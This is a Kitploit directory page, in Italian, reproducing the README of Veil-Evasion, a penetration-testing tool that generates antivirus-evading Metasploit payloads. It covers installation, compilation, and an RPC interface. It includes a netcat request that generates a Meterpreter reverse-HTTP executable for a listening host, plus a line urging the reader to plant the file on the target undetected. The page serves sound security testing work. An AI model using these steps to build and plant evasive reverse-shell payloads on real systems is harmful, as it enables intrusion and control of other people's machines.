Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Veil-Evasion — Veil Evasion non è più supportato, usa Veil 3.0! | Kitploit
Strumenti/GitHubGitHub/veil-framework/veil-evasion
Framework di ExploitGenerazione di PayloadPenetration TestingCommand and ControlGenerazione di ShellcodeArchived
GitHubveil-framework/veil-evasion

Veil-Evasion

Veil Evasion non è più supportato, usa Veil 3.0!

Vedi Repository
1.8k67564 anni faRevisionato da Kitploit
Sito web

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Veil-Evasion

Veil-Evasion è uno strumento progettato per generare payload metasploit che bypassano le comuni soluzioni antivirus.

NOTA: ./setup/setup.sh dovrebbe essere rieseguito ad ogni aggiornamento di versione principale. Se ricevi errori gravi durante l'esecuzione di Veil-Evasion, prova prima a rieseguire questo script per installare eventuali pacchetti aggiuntivi e aggiornare il file di configurazione comune.

Veil-Evasion è attualmente supportato attivamente da @ChrisTruncer, @TheMightyShiv, @HarmJ0y.

Ringraziamenti a:

  • @jasonjfrank
  • @mjmaley
  • @davidpmcguire

Requisiti Software:

Linux

  1. Usa Kali (x86) e tutte le dipendenze sono preinstallate

oppure

  1. Installa Python 2.7
  2. Installa PyCrypto >= 2.3

Windows (per compilazione Py2Exe)

  1. Python (testato con x86 - http://www.python.org/download/releases/2.7/)
  2. Py2Exe (http://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/)
  3. PyCrypto (http://www.voidspace.org.uk/python/modules.shtml)
  • PyWin32 (http://sourceforge.net/projects/pywin32/files/pywin32/Build%20218/pywin32-218.win32-py2.7.exe/download)
  • Setup (tl;dr)

    NOTA: L'installazione deve essere eseguita con privilegi di superutente. Se non stai usando Kali Linux, anteponi a ogni comando sudo o passa all'utente root prima di iniziare.

    Esegui setup.sh -c su Kali x86.

    Installa Python 2.7, Py2Exe, PyCrypto e PyWin32 su un computer Windows (per Py2Exe).

    Installazione Rapida

    root@kitploit:~
    apt-get -y install git
    git clone https://github.com/Veil-Framework/Veil-Evasion.git
    cd Veil-Evasion/
    cd setup
    setup.sh -c
    

    Rigenerazione della Configurazione

    NOTA: Questo deve essere fatto con privilegi di superutente. Se non stai usando Kali Linux, anteponi a ogni comando sudo o passa all'utente root prima di iniziare.

    La maggior parte delle volte il file di configurazione in /etc/veil/settings.py non necessita di essere ricostruito, ma in alcuni casi potresti essere invitato a farlo. Il file è generato da config/update.py.

    È importante che tu sia nella directory config/ prima di eseguire update.py. Se non lo sei, settings.py sarà errato e quando avvierai Veil-Evasion vedrai quanto segue.

    root@kitploit:~
        Main Menu
    
                0 payloads loaded
    

    Niente panico. Entra nella directory config/ e riesegui update.py.

    Descrizione

    Veil-Evasion è stato progettato per funzionare su Kali Linux, ma dovrebbe funzionare su qualsiasi sistema in grado di eseguire script Python. Basta invocare Veil-Evasion dalla riga di comando e seguire il menu per generare un payload. Una volta creato il payload, Veil-Evasion chiederà se si desidera convertire il file del payload in un eseguibile tramite Pyinstaller o Py2Exe.

    Se si utilizza Pyinstaller, Veil-Evasion convertirà il tuo payload in un eseguibile all'interno di Kali.

    Se si utilizza Py2Exe, Veil-Evasion creerà tre file:

    • payload.py - Il file del payload
    • setup.py - File richiesto per Py2Exe
    • runme.bat - Script batch per compilare il payload in un eseguibile Windows

    Sposta tutti e tre i file sulla tua macchina Windows con Python installato. Tutti e tre i file devono essere posizionati nella radice della directory in cui è stato installato Python (probabilmente C:\Python27). Esegui lo script batch per convertire lo script Python in un formato eseguibile.

    Posiziona il file eseguibile sulla macchina target con qualsiasi mezzo necessario e non farti scoprire!

    Server RPC

    Sul lato listener, esegui:

    ./Veil-Evasion --rpc

    Questo avvierà un listener sulla porta 4242.

    Sul lato client, dovrai eseguire un programma client. Può essere uno script personalizzato o semplice come Netcat. Il server RPC implementa JSON-RPC. Questo è un buon riferimento per interpretare richieste e risposte per JSON-RPC: http://json-rpc.org/wiki/specification

    Il formato della richiesta RPC è il seguente:

    root@kitploit:~
        method="version"            -   restituisce il numero di versione corrente di Veil-Evasion
        method="payloads"           -   restituisce tutti i payload attualmente caricati
        method="payload_options"
            params="payload_name"   -   restituisce le opzioni per il payload specificato
        method="generate"
            params=["payload=X",   
                    "outputbase=Y"
                    "overwrite=Z",
                    "msfvenom=...",
                    "LHOST=blah]     -   genera il payload specificato con le opzioni fornite e restituisce il percorso dell'eseguibile generato
    

    Questo è un semplice esempio di utilizzo di Veil-Evasion con Netcat:

    root@kitploit:~
    root@kali:~# nc 127.0.0.1 4242
    {"method":"version","params":[],"id":0}
    

    E la risposta del server:

    root@kitploit:~
    {"id":0,"result":"2.21.4","error":null}
    
    

    Un esempio di programma client può essere trovato qui: http://github.com/miligulmohar/python-symmetric-jsonrpc/blob/master/examples/client.py

    NOTA: La porta per Veil-Evasion è 4242. Questa deve essere modificata in client.py per funzionare.

    Per generare un payload, TUTTI i parametri devono essere inclusi:

    • payload - quale payload generare
    • outputbase - il nome con cui salvare il payload
    • LHOST - l'indirizzo IP per l'host in ascolto
    • LPORT - la porta per l'host in ascolto
    • pwnstaller - True per impacchettare i programmi Python in un eseguibile. False altrimenti. Ignorato per altri payload

    Questa è un buon riferimento per capire se utilizzare o meno pwnstaller: http://www.verisgroup.com/blog/2014/05/07/pwnstaller-and-the-veil-framework/

    Un esempio di generazione di un payload:

    root@kitploit:~
    root@kali:~# nc 127.0.0.1 4242
    {"method":"generate","params":["payload=c/meterpreter/rev_http","outputbase=payloadName","LHOST=192.168.1.11","LPORT=2121","pwnstaller=False"],"id":1"}
    

    E la risposta del server:

    root@kitploit:~
    {"id":8,"result":"/usr/share/veil-output/compiled/payloadName.exe","error":null}
    

    NOTA: Se non viene specificato alcun id nella richiesta, Veil-Evasion si spegnerà. Detto questo, puoi effettuare tutte le richieste valide che desideri fino a quando Veil-Evasion si spegne.

    Per spegnere il server RPC esegui:

    ./Veil-Evasion --rpcshutdown

    Scarica lo strumento